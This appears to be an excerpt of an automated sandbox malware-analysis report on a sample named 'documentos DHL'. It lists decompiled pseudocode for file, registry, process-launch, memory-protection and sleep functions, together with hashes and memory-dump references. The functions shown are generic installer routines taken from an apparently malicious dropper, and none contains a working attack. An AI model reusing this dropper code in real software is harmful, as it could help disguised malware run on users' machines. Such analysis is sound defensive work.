Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
Instruction ID: a0b70af09676f49ae35af12b400ff138e6ea5c47fed9fef2c083bef2843b0e9d
Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
Instruction Fuzzy Hash: 97C04C71255506DADB105F31DE08F1B7A50AB60751F11843AA18AE51B0DA348455DD2D

Uniqueness

Uniqueness Score: -1.00%

Function 0338E55D Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?), ref: 0338E69D

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a07938691032f5b56782a2f9468f9aae203f378000137c72aa4a8808069c1f6c
Instruction ID: 51414e6c3244619482c231fef14ad73aff0dba3e0c5f845ae65e575da50e8a7c
Opcode Fuzzy Hash: a07938691032f5b56782a2f9468f9aae203f378000137c72aa4a8808069c1f6c
Instruction Fuzzy Hash: 7921D27150434A9FCF709E3889297DBB7E8AF59310F860A0EDCCAD7220D3305AC18B56

Uniqueness

Uniqueness Score: -1.00%

Function 004027E9 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E004027E9(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t17;
				void* _t19;

				_t15 = __edx;
				_push(ds);
				if(__eflags != 0) {
					_t8 = E00402C15(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x4c)) = _t15;
					_t10 = SetFilePointer(E00406310(_t14, _t17), _t8, _t12,  *(_t19 - 0x1c)); // executed
					if( *((intOrPtr*)(_t19 - 0x24)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E004062F7();
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x004027e9
0x004027e9
0x004027ea
0x004027f2
0x004027f7
0x004027f8
0x00402807
0x00402810
0x00402a61
0x00402a62
0x00402a65
0x00402a65
0x00402810
0x00402ac2
0x00402ace

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807

Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: df39207a0041021f90c9c5904dee6126a22bdfdf8dd6c18872903947b59110e0
Instruction ID: 55fb61e46e544c01c8f838511187bb9fe83791c0a23b57862087ec8cac53259a
Opcode Fuzzy Hash: df39207a0041021f90c9c5904dee6126a22bdfdf8dd6c18872903947b59110e0
Instruction Fuzzy Hash: EDE09271A00104AFDB11EBA5AF499AE7779DB80304B14407FF501F11D2CB790D52DE2E

Uniqueness

Uniqueness Score: -1.00%

Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402306(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402C37(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x24)) != _t11) {
					_t13 = E00402C37(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x18)) != _t11) {
					_t11 = E00402C37(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402C37(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x00402306
0x00402306
0x00402308
0x0040230c
0x0040230f
0x00402314
0x00402319
0x00402322
0x00402322
0x00402327
0x00402330
0x00402330
0x0040233d
0x004015b4
0x004015b6
0x00402885
0x00402885
0x00402ac2
0x00402ace

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D

Uniqueness

Uniqueness Score: -1.00%

Function 0040624B Relevance: 1.5, APIs: 1, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040624B(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E004061A2(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x00406255
0x0040625e
0x00406274
0x00000000
0x00406274
0x00406262
0x00000000

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406274

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: 479e159ceda2cb7b50184963f42fe168e38793edbf0b306f3e9e40cefa011f94
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: F5E0E672010109BEEF195F50DD0AD7B371DE704314F01452EFA07E4051E6B5A9305734

Uniqueness

Uniqueness Score: -1.00%

Function 100027C2 Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
					 *0x1000405c = 0xc2;
					 *0x1000404c = 0;
					 *0x10004054 = 0;
					 *0x10004068 = 0;
					 *0x10004058 = 0;
					 *0x10004050 = 0;
					 *0x10004060 = 0;
					 *0x1000405e = 0;
				}
				return 1;
			}

0x100027cb
0x100027d0
0x100027e0
0x100027e8
0x100027ef
0x100027f4
0x100027f9
0x100027fe
0x10002803
0x10002808
0x1000280d
0x1000280d
0x10002815

APIs

VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0

Memory Dump Source

Source File: 00000002.00000002.1825292109.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.1825259905.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1825336540.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1825369944.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_documentos DHL.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19

Uniqueness

Uniqueness Score: -1.00%

Function 0040621D Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040621D(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E004061A2(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x00406227
0x0040622e
0x00406241
0x00000000
0x00406241
0x00406232
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062AB,00422708,00000000,?,?,Call,?), ref: 00406241

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 3024dc78f91217c8ac754af2bee00b96045fdb9f0f4599777b3fb0e88d8c22ab
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: 8AD0123200020DBBDF116E919D05FAB371DEB04310F014426FE16A4091D775D530AB15

Uniqueness

Uniqueness Score: -1.00%

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402C37(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015ae
0x004015b4
0x004015b6
0x00402885
0x00402885
0x00402ac2
0x00402ace

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 29d25e4036f002882842ff2abbc33b1b61682e4b1f0e1c41cb6674e83b655918
Instruction ID: 608ef69ca2b13f27eda1cfcd16162797e0d7c1effb02ba883df1ee114d760796
Opcode Fuzzy Hash: 29d25e4036f002882842ff2abbc33b1b61682e4b1f0e1c41cb6674e83b655918
Instruction Fuzzy Hash: 44D01272B04104DBDB21DBA4AF0859D73A59B10364B204677E101F11D1DAB989559A1D

Uniqueness

Uniqueness Score: -1.00%

Function 00403441 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403441(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x0040344f
0x00403455

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 0040437A Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040437A(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x42a248, 0x28, _a4, 1); // executed
				return _t2;
			}

0x00404388
0x0040438e

APIs

SendMessageW.USER32(00000028,?,00000001,004041A5), ref: 00404388

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19

Uniqueness

Uniqueness Score: -1.00%

Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401F00() {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402C37(_t15);
				E00405414(0xffffffeb, _t7);
				_t9 = E00405995(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x20)) != _t15) {
						_t13 = E0040683B(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x24)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004062F7( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401f06
0x00401f0b
0x00401f11
0x00401f16
0x00401f1a
0x00402885
0x00401f20
0x00401f23
0x00401f26
0x00401f2e
0x00401f3d
0x00401f3f
0x00401f3f
0x00401f30
0x00401f34
0x00401f34
0x00401f2e
0x00401f46
0x00401f47
0x00401f47
0x00402ac2
0x00402ace

APIs

Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC), ref: 0040546F
Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF

Part of subcall function 00405995: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
Part of subcall function 00405995: CloseHandle.KERNEL32(?), ref: 004059CB

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47

Part of subcall function 0040683B: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040684C
Part of subcall function 0040683B: GetExitCodeProcess.KERNEL32(?,?), ref: 0040686E

Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: b4474b7c365b70f9dc7c58f3b4c8f6c607978000052ce3e09dedc8896c81aea9
Instruction ID: 78872c6594437c8f6fb94a475087433cb7c5ddb6828dda6eb17a8edff69df0b5
Opcode Fuzzy Hash: b4474b7c365b70f9dc7c58f3b4c8f6c607978000052ce3e09dedc8896c81aea9
Instruction Fuzzy Hash: 93F0F072905021DBCB20FBA58E848DE72B09F01328B2101BFF101F21D1C77C0E418AAE

Uniqueness

Uniqueness Score: -1.00%

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402C15(_t7);
				 *((intOrPtr*)(_t13 - 0x4c)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}

0x004014d7
0x004014d8
0x004014e1
0x004014e4
0x004014e8
0x004014e8
0x004014ea
0x00402ac2
0x00402ace

APIs

Sleep.KERNELBASE(00000000), ref: 004014EA

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: cb92cf7ccb1965bdce3badc7d49dd673c55c158fa478f1f9cab94f81649d65d9
Instruction ID: adf76bd272608bb1b99769d9a9b05885636640fbfa2c3f91bbd7a8ebdab0685d
Opcode Fuzzy Hash: cb92cf7ccb1965bdce3badc7d49dd673c55c158fa478f1f9cab94f81649d65d9
Instruction Fuzzy Hash: 45D0A773F141008BD720EBB8BE8945E73F8E7803193208837E102F11D1E578C8928A2D

Uniqueness

Uniqueness Score: -1.00%

Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000121B() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x1000406c +  *0x1000406c); // executed
				return _t3;
			}

0x10001225
0x1000122b

APIs

GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

Memory Dump Source

Source File: 00000002.00000002.1825292109.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.1825259905.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1825336540.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1825369944.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_documentos DHL.jbxd

Similarity

API ID: AllocGlobal
String ID:
